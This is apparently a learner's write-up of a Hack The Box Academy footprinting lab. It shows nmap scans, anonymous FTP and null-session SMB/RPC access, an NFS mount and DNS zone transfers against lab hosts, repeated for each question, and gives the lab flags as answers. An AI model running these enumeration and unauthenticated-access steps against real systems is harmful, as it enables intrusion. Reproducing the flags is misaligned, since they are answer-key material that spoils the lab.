FOOTPRINTING

FTP

Which version of the FTP server is running on the target system? Submit the entire banner as the answer.

root@htb:~$ sudo nmap -sS -T4 10.129.202.5 -p-
 PORT      STATE SERVICE
 21/tcp    open  ftp
 22/tcp    open  ssh
 111/tcp   open  rpcbind
 139/tcp   open  netbios-ssn
 445/tcp   open  microsoft-ds
 2049/tcp  open  nfs
 40287/tcp open  unknown
 50947/tcp open  unknown
 50951/tcp open  unknown
 51319/tcp open  unknown
 
root@htb:~$ sudo nmap -sV -sC -T4 10.129.202.5 -p 21
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp
 | fingerprint-strings: 
 |   GenericLines: 
 |     220 InFreight FTP v1.1
 |     Invalid command: try being more creative
 |_    Invalid command: try being more creative
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_-rw-r--r--   1 ftpuser  ftpuser        39 Nov  8  2021 flag.txt
 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
 SF-Port21-TCP:V=7.94SVN%I=7%D=8/17%Time=68A2855C%P=x86_64-pc-linux-gnu%r(G
 SF:enericLines,74,"220\x20InFreight\x20FTP\x20v1\.1\r\n500\x20Invalid\x20c
 SF:ommand:\x20try\x20being\x20more\x20creative\r\n500\x20Invalid\x20comman
 SF:d:\x20try\x20being\x20more\x20creative\r\n");

root@htb:~$ ftp -p 10.129.202.5
 Connected to 10.129.202.5.
 220 InFreight FTP v1.1
 Name (10.129.202.5:root): anonymous 
 331 Anonymous login ok, send your complete email address as your password
 Password: 
 230 Anonymous access granted, restrictions apply
 Remote system type is UNIX.
 Using binary mode to transfer files.

Enumerate the FTP server and find the flag.txt file. Submit the contents of it as the answer.

root@htb:~$ sudo nmap -sS -T4 10.129.202.5 -p-
 PORT      STATE SERVICE
 21/tcp    open  ftp
 22/tcp    open  ssh
 111/tcp   open  rpcbind
 139/tcp   open  netbios-ssn
 445/tcp   open  microsoft-ds
 2049/tcp  open  nfs
 40287/tcp open  unknown
 50947/tcp open  unknown
 50951/tcp open  unknown
 51319/tcp open  unknown
 
root@htb:~$ sudo nmap -sV -sC -T4 10.129.202.5 -p 21
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp
 | fingerprint-strings: 
 |   GenericLines: 
 |     220 InFreight FTP v1.1
 |     Invalid command: try being more creative
 |_    Invalid command: try being more creative
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_-rw-r--r--   1 ftpuser  ftpuser        39 Nov  8  2021 flag.txt
 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
 SF-Port21-TCP:V=7.94SVN%I=7%D=8/17%Time=68A2855C%P=x86_64-pc-linux-gnu%r(G
 SF:enericLines,74,"220\x20InFreight\x20FTP\x20v1\.1\r\n500\x20Invalid\x20c
 SF:ommand:\x20try\x20being\x20more\x20creative\r\n500\x20Invalid\x20comman
 SF:d:\x20try\x20being\x20more\x20creative\r\n");

root@htb:~$ ftp -p 10.129.202.5
 Connected to 10.129.202.5.
 220 InFreight FTP v1.1
 Name (10.129.202.5:root): anonymous 
 331 Anonymous login ok, send your complete email address as your password
 Password: 
 230 Anonymous access granted, restrictions apply
 Remote system type is UNIX.
 Using binary mode to transfer files.

ftp> ls -R
229 Entering Extended Passive Mode (|||47094|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 ftpuser  ftpuser        39 Nov  8  2021 flag.txt
226 Transfer complete

ftp> more flag.txt
 HTB{b7skjr4c76zhsds7fzhd4k3ujg7nhdjre}

SMB

What version of the SMB server is running on the target system? Submit the entire banner as the answer.

root@htb:~$ sudo nmap -sS -T4 10.129.202.5 -p-
 PORT      STATE SERVICE
 21/tcp    open  ftp
 22/tcp    open  ssh
 111/tcp   open  rpcbind
 139/tcp   open  netbios-ssn
 445/tcp   open  microsoft-ds
 2049/tcp  open  nfs
 34055/tcp open  unknown
 40999/tcp open  unknown
 41799/tcp open  unknown
 48525/tcp open  unknown

root@htb:~$ sudo nmap -sV -sC 10.129.202.5 -p 139,445
 PORT    STATE SERVICE     VERSION
 139/tcp open  netbios-ssn Samba smbd 4.6.2
 445/tcp open  netbios-ssn Samba smbd 4.6.2

 Host script results:
 | smb2-security-mode: 
 |   3:1:1: 
 |_    Message signing enabled but not required
 |_nbstat: NetBIOS name: DEVSMB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-time: 
 |   date: 2025-09-01T04:06:00
 |_  start_date: N/A
 |_clock-skew: -1s

What is the name of the accessible share on the target?

root@htb:~$ sudo nmap -sS -T4 10.129.202.5 -p-
 PORT      STATE SERVICE
 21/tcp    open  ftp
 22/tcp    open  ssh
 111/tcp   open  rpcbind
 139/tcp   open  netbios-ssn
 445/tcp   open  microsoft-ds
 2049/tcp  open  nfs
 34055/tcp open  unknown
 40999/tcp open  unknown
 41799/tcp open  unknown
 48525/tcp open  unknown

root@htb:~$ sudo nmap -sV -sC 10.129.202.5 -p 139,445
 PORT    STATE SERVICE     VERSION
 139/tcp open  netbios-ssn Samba smbd 4.6.2
 445/tcp open  netbios-ssn Samba smbd 4.6.2

 Host script results:
 | smb2-security-mode: 
 |   3:1:1: 
 |_    Message signing enabled but not required
 |_nbstat: NetBIOS name: DEVSMB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-time: 
 |   date: 2025-09-01T04:06:00
 |_  start_date: N/A
 |_clock-skew: -1s

root@htb:~$ smbclient -N -L //10.129.202.5
 Sharename       Type      Comment
 ---------       ----      -------
 print$          Disk      Printer Drivers
 sambashare      Disk      InFreight SMB v3.1
 IPC$            IPC       IPC Service (InlaneFreight SMB server (Samba, Ubuntu))

 Reconnecting with SMB1 for workgroup listing.
 smbXcli_negprot_smb1_done: No compatible protocol selected by server.
 protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
 Unable to connect with SMB1 -- no workgroup available

Connect to the discovered share and find the flag.txt file. Submit the contents as the answer.

root@htb:~$ sudo nmap -sS -T4 10.129.202.5 -p-
 PORT      STATE SERVICE
 21/tcp    open  ftp
 22/tcp    open  ssh
 111/tcp   open  rpcbind
 139/tcp   open  netbios-ssn
 445/tcp   open  microsoft-ds
 2049/tcp  open  nfs
 34055/tcp open  unknown
 40999/tcp open  unknown
 41799/tcp open  unknown
 48525/tcp open  unknown

root@htb:~$ sudo nmap -sV -sC 10.129.202.5 -p 139,445
 PORT    STATE SERVICE     VERSION
 139/tcp open  netbios-ssn Samba smbd 4.6.2
 445/tcp open  netbios-ssn Samba smbd 4.6.2

 Host script results:
 | smb2-security-mode: 
 |   3:1:1: 
 |_    Message signing enabled but not required
 |_nbstat: NetBIOS name: DEVSMB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-time: 
 |   date: 2025-09-01T04:06:00
 |_  start_date: N/A
 |_clock-skew: -1s

root@htb:~$ smbclient -N -L //10.129.202.5
 Sharename       Type      Comment
 ---------       ----      -------
 print$          Disk      Printer Drivers
 sambashare      Disk      InFreight SMB v3.1
 IPC$            IPC       IPC Service (InlaneFreight SMB server (Samba, Ubuntu))

 Reconnecting with SMB1 for workgroup listing.
 smbXcli_negprot_smb1_done: No compatible protocol selected by server.
 protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
 Unable to connect with SMB1 -- no workgroup available
 
root@htb:~$ smbclient //10.129.202.5/sambashare
 Password for [WORKGROUP\htb-ac-53539]:
 Try "help" to get a list of possible commands.
 
smb: \> ls
 .                                   D        0  Mon Nov  8 07:43:14 2021
 ..                                  D        0  Mon Nov  8 09:53:19 2021
 .profile                            H      807  Tue Feb 25 06:03:22 2020
 contents                            D        0  Mon Nov  8 07:43:45 2021
 .bash_logout                        H      220  Tue Feb 25 06:03:22 2020
 .bashrc                             H     3771  Tue Feb 25 06:03:22 2020

	5090944 blocks of size 1024. 1765980 blocks available

smb: \> ls contents
 contents                            D        0  Mon Nov  8 07:43:45 2021

	5090944 blocks of size 1024. 1765972 blocks available

smb: \> ls \contents
 contents                            D        0  Mon Nov  8 07:43:45 2021

 \contents
  .                                   D        0  Mon Nov  8 07:43:45 2021
  ..                                  D        0  Mon Nov  8 07:43:14 2021
  flag.txt                            N       38  Mon Nov  8 07:43:45 2021

	5090944 blocks of size 1024. 1765964 blocks available

smb: \> get \contents\flag.txt
 getting file \contents\flag.txt of size 38 as \contents\flag.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
 
 
root@htb:~$ cat "\contents\flag.txt"
 HTB{o873nz4xdo873n4zo873zn4fksuhldsf}

Find out which domain the server belongs to.

root@htb:~$ sudo nmap -sS -T4 10.129.202.5 -p-
 PORT      STATE SERVICE
 21/tcp    open  ftp
 22/tcp    open  ssh
 111/tcp   open  rpcbind
 139/tcp   open  netbios-ssn
 445/tcp   open  microsoft-ds
 2049/tcp  open  nfs
 34055/tcp open  unknown
 40999/tcp open  unknown
 41799/tcp open  unknown
 48525/tcp open  unknown

root@htb:~$ sudo nmap -sV -sC 10.129.202.5 -p 139,445
 PORT    STATE SERVICE     VERSION
 139/tcp open  netbios-ssn Samba smbd 4.6.2
 445/tcp open  netbios-ssn Samba smbd 4.6.2

 Host script results:
 | smb2-security-mode: 
 |   3:1:1: 
 |_    Message signing enabled but not required
 |_nbstat: NetBIOS name: DEVSMB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-time: 
 |   date: 2025-09-01T04:06:00
 |_  start_date: N/A
 |_clock-skew: -1s

root@htb:~$ rpcclient -U "" 10.129.202.5
 Password for [WORKGROUP\]:

rpcclient $> querydominfo
 Domain:	DEVOPS
 Server:	DEVSMB
 Comment:	InlaneFreight SMB server (Samba, Ubuntu)
 Total Users:	0
 Total Groups:	0
 Total Aliases:	0
 Sequence No:	1756702138
 Force Logoff:	-1
 Domain Server State:	0x1
 Server Role:	ROLE_DOMAIN_PDC
 Unknown 3:	0x1

rpcclient $>

Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer.

root@htb:~$ sudo nmap -sS -T4 10.129.202.5 -p-
 PORT      STATE SERVICE
 21/tcp    open  ftp
 22/tcp    open  ssh
 111/tcp   open  rpcbind
 139/tcp   open  netbios-ssn
 445/tcp   open  microsoft-ds
 2049/tcp  open  nfs
 34055/tcp open  unknown
 40999/tcp open  unknown
 41799/tcp open  unknown
 48525/tcp open  unknown

root@htb:~$ sudo nmap -sV -sC 10.129.202.5 -p 139,445
 PORT    STATE SERVICE     VERSION
 139/tcp open  netbios-ssn Samba smbd 4.6.2
 445/tcp open  netbios-ssn Samba smbd 4.6.2

 Host script results:
 | smb2-security-mode: 
 |   3:1:1: 
 |_    Message signing enabled but not required
 |_nbstat: NetBIOS name: DEVSMB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-time: 
 |   date: 2025-09-01T04:06:00
 |_  start_date: N/A
 |_clock-skew: -1s

root@htb:~$ smbclient -N -L //10.129.202.5
 Sharename       Type      Comment
 ---------       ----      -------
 print$          Disk      Printer Drivers
 sambashare      Disk      InFreight SMB v3.1
 IPC$            IPC       IPC Service (InlaneFreight SMB server (Samba, Ubuntu))

 Reconnecting with SMB1 for workgroup listing.
 smbXcli_negprot_smb1_done: No compatible protocol selected by server.
 protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
 Unable to connect with SMB1 -- no workgroup available

root@htb:~$ rpcclient -U "" 10.129.202.5
 Password for [WORKGROUP\]:

rpcclient $> netsharegetinfo sambashare
 netname: sambashare
	remark:	InFreight SMB v3.1
	path:	C:\home\sambauser\
	password:	
	type:	0x0
	perms:	0
	max_uses:	-1
	num_uses:	1
 revision: 1
 type: 0x8004: SEC_DESC_DACL_PRESENT SEC_DESC_SELF_RELATIVE 
 DACL
	ACL	Num ACEs:	1	revision:	2
	---
	ACE
		type: ACCESS ALLOWED (0) flags: 0x00 
		Specific bits: 0x1ff
		Permissions: 0x1f01ff: SYNCHRONIZE_ACCESS WRITE_OWNER_ACCESS WRITE_DAC_ACCESS READ_CONTROL_ACCESS DELETE_ACCESS 
		SID: S-1-1-0

What is the full system path of that specific share? (format: "/directory/names")

root@htb:~$ sudo nmap -sS -T4 10.129.202.5 -p-
 PORT      STATE SERVICE
 21/tcp    open  ftp
 22/tcp    open  ssh
 111/tcp   open  rpcbind
 139/tcp   open  netbios-ssn
 445/tcp   open  microsoft-ds
 2049/tcp  open  nfs
 34055/tcp open  unknown
 40999/tcp open  unknown
 41799/tcp open  unknown
 48525/tcp open  unknown

root@htb:~$ sudo nmap -sV -sC 10.129.202.5 -p 139,445
 PORT    STATE SERVICE     VERSION
 139/tcp open  netbios-ssn Samba smbd 4.6.2
 445/tcp open  netbios-ssn Samba smbd 4.6.2

 Host script results:
 | smb2-security-mode: 
 |   3:1:1: 
 |_    Message signing enabled but not required
 |_nbstat: NetBIOS name: DEVSMB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-time: 
 |   date: 2025-09-01T04:06:00
 |_  start_date: N/A
 |_clock-skew: -1s

root@htb:~$ smbclient -N -L //10.129.202.5
 Sharename       Type      Comment
 ---------       ----      -------
 print$          Disk      Printer Drivers
 sambashare      Disk      InFreight SMB v3.1
 IPC$            IPC       IPC Service (InlaneFreight SMB server (Samba, Ubuntu))

 Reconnecting with SMB1 for workgroup listing.
 smbXcli_negprot_smb1_done: No compatible protocol selected by server.
 protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
 Unable to connect with SMB1 -- no workgroup available

root@htb:~$ rpcclient -U "" 10.129.202.5
 Password for [WORKGROUP\]:

rpcclient $> netsharegetinfo sambashare
 netname: sambashare
	remark:	InFreight SMB v3.1
	path:	C:\home\sambauser\
	password:	
	type:	0x0
	perms:	0
	max_uses:	-1
	num_uses:	1
 revision: 1
 type: 0x8004: SEC_DESC_DACL_PRESENT SEC_DESC_SELF_RELATIVE 
 DACL
	ACL	Num ACEs:	1	revision:	2
	---
	ACE
		type: ACCESS ALLOWED (0) flags: 0x00 
		Specific bits: 0x1ff
		Permissions: 0x1f01ff: SYNCHRONIZE_ACCESS WRITE_OWNER_ACCESS WRITE_DAC_ACCESS READ_CONTROL_ACCESS DELETE_ACCESS 
		SID: S-1-1-0
		
 * /home/sambauser
    - since this is a linux OS, the path format is /.../...

NFS

Enumerate the NFS service and submit the contents of the flag.txt in the "nfs" share as the answer.

root@oco:~$ sudo nmap -sV -sC 10.129.4.99 -p111,2049
 Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-19 17:12 CEST
 Nmap scan report for 10.129.14.128
 Host is up (0.00018s latency).

 PORT    STATE SERVICE VERSION
 111/tcp  open  rpcbind 2-4 (RPC #100000)
 | rpcinfo: 
 |   program version    port/proto  service
 |   100000  2,3,4        111/tcp   rpcbind
 |   100000  2,3,4        111/udp   rpcbind
 |   100000  3,4          111/tcp6  rpcbind
 |   100000  3,4          111/udp6  rpcbind
 |   100003  3           2049/udp   nfs
 |   100003  3           2049/udp6  nfs
 |   100003  3,4         2049/tcp   nfs
 |   100003  3,4         2049/tcp6  nfs
 |   100005  1,2,3      36141/tcp   mountd
 |   100005  1,2,3      42471/udp   mountd
 |   100005  1,2,3      44238/udp6  mountd
 |   100005  1,2,3      56227/tcp6  mountd
 |   100021  1,3,4      39135/tcp   nlockmgr
 |   100021  1,3,4      45501/tcp6  nlockmgr
 |   100021  1,3,4      56563/udp6  nlockmgr
 |   100021  1,3,4      58489/udp   nlockmgr
 |   100227  3           2049/tcp   nfs_acl
 |   100227  3           2049/tcp6  nfs_acl
 |   100227  3           2049/udp   nfs_acl
 |_  100227  3           2049/udp6  nfs_acl
 2049/tcp open  nfs     3-4 (RPC #100003)
 
 * the rpcinfo NSE script retrieves a list of all currently running RPC services, their 
   names and descriptions, and the ports they use. This lets us check whether the 
   target share is connected to the network on all required ports
    - the rpcinfo NSE script was implicitly run by NMAP through -sC (default Script Set)

root@oco:~$ sudo nmap -sV --script nfs* 10.129.4.99 -p111,2049
 Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-19 17:37 CEST
 Nmap scan report for 10.129.14.128
 Host is up (0.00021s latency).

 PORT     STATE SERVICE VERSION
 111/tcp  open  rpcbind 2-4 (RPC #100000)
 | rpcinfo: 
 |   program version    port/proto  service
 |   100003  3           2049/udp6  nfs
 |   100003  3,4         2049/tcp6  nfs
 |   100021  1,3,4      39135/tcp   nlockmgr
 |   100021  1,3,4      45501/tcp6  nlockmgr
 |   100021  1,3,4      56563/udp6  nlockmgr
 |   100021  1,3,4      58489/udp   nlockmgr
 |   100227  3           2049/tcp6  nfs_acl
 |_  100227  3           2049/udp6  nfs_acl
 2049/tcp open  nfs     3-4 (RPC #100003)

root@oco:~$ showmount -e 10.129.4.99
 Export list for 10.129.4.99:
 /var/nfs      10.0.0.0/8
 /mnt/nfsshare 10.0.0.0/8

root@oco:~$ mkdir target-NFS
root@oco:~$ sudo mount -t nfs 10.129.4.99:/ ./target-NFS/ -o nolock
root@oco:~$ cd target-NFS
root@oco:~$ sudo apt install tree
root@oco:~$ tree .
 .
 ├── mnt
 │   └── nfsshare
 │       └── flag.txt
 └── var
     └── nfs
         └── flag.txt

 5 directories, 2 files
 
root@oco:~$ cat var/nfs/flag.txt
 HTB{hjglmvtkjhlkfuhgi734zthrie7rjmdze}

Enumerate the NFS service and submit the contents of the flag.txt in the "nfsshare" share as the answer.

root@oco:~$ sudo nmap -sV -sC 10.129.4.99 -p111,2049
 Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-19 17:12 CEST
 Nmap scan report for 10.129.14.128
 Host is up (0.00018s latency).

 PORT    STATE SERVICE VERSION
 111/tcp  open  rpcbind 2-4 (RPC #100000)
 | rpcinfo: 
 |   program version    port/proto  service
 |   100000  2,3,4        111/tcp   rpcbind
 |   100000  2,3,4        111/udp   rpcbind
 |   100000  3,4          111/tcp6  rpcbind
 |   100000  3,4          111/udp6  rpcbind
 |   100003  3           2049/udp   nfs
 |   100003  3           2049/udp6  nfs
 |   100003  3,4         2049/tcp   nfs
 |   100003  3,4         2049/tcp6  nfs
 |   100005  1,2,3      36141/tcp   mountd
 |   100005  1,2,3      42471/udp   mountd
 |   100005  1,2,3      44238/udp6  mountd
 |   100005  1,2,3      56227/tcp6  mountd
 |   100021  1,3,4      39135/tcp   nlockmgr
 |   100021  1,3,4      45501/tcp6  nlockmgr
 |   100021  1,3,4      56563/udp6  nlockmgr
 |   100021  1,3,4      58489/udp   nlockmgr
 |   100227  3           2049/tcp   nfs_acl
 |   100227  3           2049/tcp6  nfs_acl
 |   100227  3           2049/udp   nfs_acl
 |_  100227  3           2049/udp6  nfs_acl
 2049/tcp open  nfs     3-4 (RPC #100003)
 
 * the rpcinfo NSE script retrieves a list of all currently running RPC services, their 
   names and descriptions, and the ports they use. This lets us check whether the 
   target share is connected to the network on all required ports
    - the rpcinfo NSE script was implicitly run by NMAP through -sC (default Script Set)

root@oco:~$ sudo nmap -sV --script nfs* 10.129.4.99 -p111,2049
 Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-19 17:37 CEST
 Nmap scan report for 10.129.14.128
 Host is up (0.00021s latency).

 PORT     STATE SERVICE VERSION
 111/tcp  open  rpcbind 2-4 (RPC #100000)
 | rpcinfo: 
 |   program version    port/proto  service
 |   100003  3           2049/udp6  nfs
 |   100003  3,4         2049/tcp6  nfs
 |   100021  1,3,4      39135/tcp   nlockmgr
 |   100021  1,3,4      45501/tcp6  nlockmgr
 |   100021  1,3,4      56563/udp6  nlockmgr
 |   100021  1,3,4      58489/udp   nlockmgr
 |   100227  3           2049/tcp6  nfs_acl
 |_  100227  3           2049/udp6  nfs_acl
 2049/tcp open  nfs     3-4 (RPC #100003)

root@oco:~$ showmount -e 10.129.4.99
 Export list for 10.129.4.99:
 /var/nfs      10.0.0.0/8
 /mnt/nfsshare 10.0.0.0/8

root@oco:~$ mkdir target-NFS
root@oco:~$ sudo mount -t nfs 10.129.4.99:/ ./target-NFS/ -o nolock
root@oco:~$ cd target-NFS
root@oco:~$ sudo apt install tree
root@oco:~$ tree .
 .
 ├── mnt
 │   └── nfsshare
 │       └── flag.txt
 └── var
     └── nfs
         └── flag.txt

 5 directories, 2 files
 
root@oco:~$ cat mnt/nfsshare/flag.txt 
 HTB{8o7435zhtuih7fztdrzuhdhkfjcn7ghi4357ndcthzuc7rtfghu34}

DNS

Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.

root@htb:~$ nmap -sS -sU -Pn -n -T4 10.129.0.0/16 -p U:53,T:53 --max-retries 0 --open -oA dnsCandidates
 Nmap scan report for 10.129.235.219
 Host is up (0.0091s latency).

 PORT   STATE SERVICE
 53/tcp open  domain
 53/udp open  domain

root@htb:~$ dig any inlanefreight.htb @10.129.235.219
 ; <<>> DiG 9.18.33-1~deb12u2-Debian <<>> any inlanefreight.htb @10.129.235.219
 ;; global options: +cmd
 ;; Got answer:
 ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32410
 ;; flags: qr aa rd; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 2
 ;; WARNING: recursion requested but not available

 ;; OPT PSEUDOSECTION:
 ; EDNS: version: 0, flags:; udp: 4096
 ; COOKIE: 6d51bd32faf48f240100000068cf37976e5569447223816e (good)
 ;; QUESTION SECTION:
 ;inlanefreight.htb.		IN	ANY

 ;; ANSWER SECTION:
 inlanefreight.htb.	604800	IN	TXT	"v=spf1 include:mailgun.org include:_spf.google.com include:spf.protection.outlook.com include:_spf.atlassian.net ip4:10.129.124.8 ip4:10.129.127.2 ip4:10.129.42.106 ~all"
 inlanefreight.htb.	604800	IN	TXT	"atlassian-domain-verification=t1rKCy68JFszSdCKVpw64A1QksWdXuYFUeSXKU"
 inlanefreight.htb.	604800	IN	TXT	"MS=ms97310371"
 inlanefreight.htb.	604800	IN	SOA	inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
 inlanefreight.htb.	604800	IN	NS	ns.inlanefreight.htb.

 ;; ADDITIONAL SECTION:
 ns.inlanefreight.htb.	604800	IN	A	127.0.0.1

 ;; Query time: 9 msec
 ;; SERVER: 10.129.235.219#53(10.129.235.219) (TCP)
 ;; WHEN: Sat Sep 20 18:24:07 CDT 2025
 ;; MSG SIZE  rcvd: 437

Identify if its possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...})

root@htb:~$ nmap -sS -sU -Pn -n -T4 10.129.0.0/16 -p U:53,T:53 --max-retries 0 --open -oA dnsCandidates
 Nmap scan report for 10.129.235.219
 Host is up (0.0091s latency).

 PORT   STATE SERVICE
 53/tcp open  domain
 53/udp open  domain

root@htb:~$ dig any inlanefreight.htb @10.129.235.219
 ; <<>> DiG 9.18.33-1~deb12u2-Debian <<>> any inlanefreight.htb @10.129.235.219
 ;; global options: +cmd
 ;; Got answer:
 ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32410
 ;; flags: qr aa rd; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 2
 ;; WARNING: recursion requested but not available

 ;; OPT PSEUDOSECTION:
 ; EDNS: version: 0, flags:; udp: 4096
 ; COOKIE: 6d51bd32faf48f240100000068cf37976e5569447223816e (good)
 ;; QUESTION SECTION:
 ;inlanefreight.htb.		IN	ANY

 ;; ANSWER SECTION:
 inlanefreight.htb.	604800	IN	TXT	"v=spf1 include:mailgun.org include:_spf.google.com include:spf.protection.outlook.com include:_spf.atlassian.net ip4:10.129.124.8 ip4:10.129.127.2 ip4:10.129.42.106 ~all"
 inlanefreight.htb.	604800	IN	TXT	"atlassian-domain-verification=t1rKCy68JFszSdCKVpw64A1QksWdXuYFUeSXKU"
 inlanefreight.htb.	604800	IN	TXT	"MS=ms97310371"
 inlanefreight.htb.	604800	IN	SOA	inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
 inlanefreight.htb.	604800	IN	NS	ns.inlanefreight.htb.

 ;; ADDITIONAL SECTION:
 ns.inlanefreight.htb.	604800	IN	A	127.0.0.1

 ;; Query time: 9 msec
 ;; SERVER: 10.129.235.219#53(10.129.235.219) (TCP)
 ;; WHEN: Sat Sep 20 18:24:07 CDT 2025
 ;; MSG SIZE  rcvd: 437

root@htb:~$ dig axfr inlanefreight.htb @10.129.235.219

 ; <<>> DiG 9.18.33-1~deb12u2-Debian <<>> axfr inlanefreight.htb @10.129.235.219
 ;; global options: +cmd
 inlanefreight.htb.	604800	IN	SOA	inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
 inlanefreight.htb.	604800	IN	TXT	"MS=ms97310371"
 inlanefreight.htb.	604800	IN	TXT	"atlassian-domain-verification=t1rKCy68JFszSdCKVpw64A1QksWdXuYFUeSXKU"
 inlanefreight.htb.	604800	IN	TXT	"v=spf1 include:mailgun.org include:_spf.google.com include:spf.protection.outlook.com include:_spf.atlassian.net ip4:10.129.124.8 ip4:10.129.127.2 ip4:10.129.42.106 ~all"
 inlanefreight.htb.	604800	IN	NS	ns.inlanefreight.htb.
 app.inlanefreight.htb.	604800	IN	A	10.129.18.15
 dev.inlanefreight.htb.	604800	IN	A	10.12.0.1
 internal.inlanefreight.htb. 604800 IN	A	10.129.1.6
 mail1.inlanefreight.htb. 604800	IN	A	10.129.18.201
 ns.inlanefreight.htb.	604800	IN	A	127.0.0.1
 inlanefreight.htb.	604800	IN	SOA	inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
 ;; Query time: 9 msec
 ;; SERVER: 10.129.235.219#53(10.129.235.219) (TCP)
 ;; WHEN: Sat Sep 20 18:28:17 CDT 2025
 ;; XFR size: 11 records (messages 1, bytes 560)

root@htb:~$ dig axfr internal.inlanefreight.htb @10.129.235.219
 ; <<>> DiG 9.18.33-1~deb12u2-Debian <<>> axfr internal.inlanefreight.htb @10.129.235.219
 ;; global options: +cmd
 internal.inlanefreight.htb. 604800 IN	SOA	inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
 internal.inlanefreight.htb. 604800 IN	TXT	"MS=ms97310371"
 internal.inlanefreight.htb. 604800 IN	TXT	"HTB{DN5_z0N3_7r4N5F3r_iskdufhcnlu34}"
 internal.inlanefreight.htb. 604800 IN	TXT	"atlassian-domain-verification=t1rKCy68JFszSdCKVpw64A1QksWdXuYFUeSXKU"
 internal.inlanefreight.htb. 604800 IN	TXT	"v=spf1 include:mailgun.org include:_spf.google.com include:spf.protection.outlook.com include:_spf.atlassian.net ip4:10.129.124.8 ip4:10.129.127.2 ip4:10.129.42.106 ~all"
 internal.inlanefreight.htb. 604800 IN	NS	ns.inlanefreight.htb.
 dc1.internal.inlanefreight.htb.	604800 IN A	10.129.34.16
 dc2.internal.inlanefreight.htb.	604800 IN A	10.129.34.11
 mail1.internal.inlanefreight.htb. 604800 IN A	10.129.18.200
 ns.internal.inlanefreight.htb. 604800 IN A	127.0.0.1
 vpn.internal.inlanefreight.htb.	604800 IN A	10.129.1.6
 ws1.internal.inlanefreight.htb.	604800 IN A	10.129.1.34
 ws2.internal.inlanefreight.htb.	604800 IN A	10.129.1.35
 wsus.internal.inlanefreight.htb. 604800	IN A	10.129.18.2
 internal.inlanefreight.htb. 604800 IN	SOA	inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
 ;; Query time: 9 msec
 ;; SERVER: 10.129.235.219#53(10.129.235.219) (TCP)
 ;; WHEN: Sat Sep 20 18:30:18 CDT 2025
 ;; XFR size: 15 records (messages 1, bytes 677)

What is the IPv4 address of the hostname DC1?

root@htb:~$ nmap -sS -sU -Pn -n -T4 10.129.0.0/16 -p U:53,T:53 --max-retries 0 --open -oA dnsCandidates
 Nmap scan report for 10.129.235.219
 Host is up (0.0091s latency).

 PORT   STATE SERVICE
 53/tcp open  domain
 53/udp open  domain

root@htb:~$ dig any inlanefreight.htb @10.129.235.219
 ; <<>> DiG 9.18.33-1~deb12u2-Debian <<>> any inlanefreight.htb @10.129.235.219
 ;; global options: +cmd
 ;; Got answer:
 ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32410
 ;; flags: qr aa rd; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 2
 ;; WARNING: recursion requested but not available

 ;; OPT PSEUDOSECTION:
 ; EDNS: version: 0, flags:; udp: 4096
 ; COOKIE: 6d51bd32faf48f240100000068cf37976e5569447223816e (good)
 ;; QUESTION SECTION:
 ;inlanefreight.htb.		IN	ANY

 ;; ANSWER SECTION:
 inlanefreight.htb.	604800	IN	TXT	"v=spf1 include:mailgun.org include:_spf.google.com include:spf.protection.outlook.com include:_spf.atlassian.net ip4:10.129.124.8 ip4:10.129.127.2 ip4:10.129.42.106 ~all"
 inlanefreight.htb.	604800	IN	TXT	"atlassian-domain-verification=t1rKCy68JFszSdCKVpw64A1QksWdXuYFUeSXKU"
 inlanefreight.htb.	604800	IN	TXT	"MS=ms97310371"
 inlanefreight.htb.	604800	IN	SOA	inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
 inlanefreight.htb.	604800	IN	NS	ns.inlanefreight.htb.

 ;; ADDITIONAL SECTION:
 ns.inlanefreight.htb.	604800	IN	A	127.0.0.1

 ;; Query time: 9 msec
 ;; SERVER: 10.129.235.219#53(10.129.235.219) (TCP)
 ;; WHEN: Sat Sep 20 18:24:07 CDT 2025
 ;; MSG SIZE  rcvd: 437

root@htb:~$ dig axfr inlanefreight.htb @10.129.235.219

 ; <<>> DiG 9.18.33-1~deb12u2-Debian <<>> axfr inlanefreight.htb @10.129.235.219
 ;; global options: +cmd
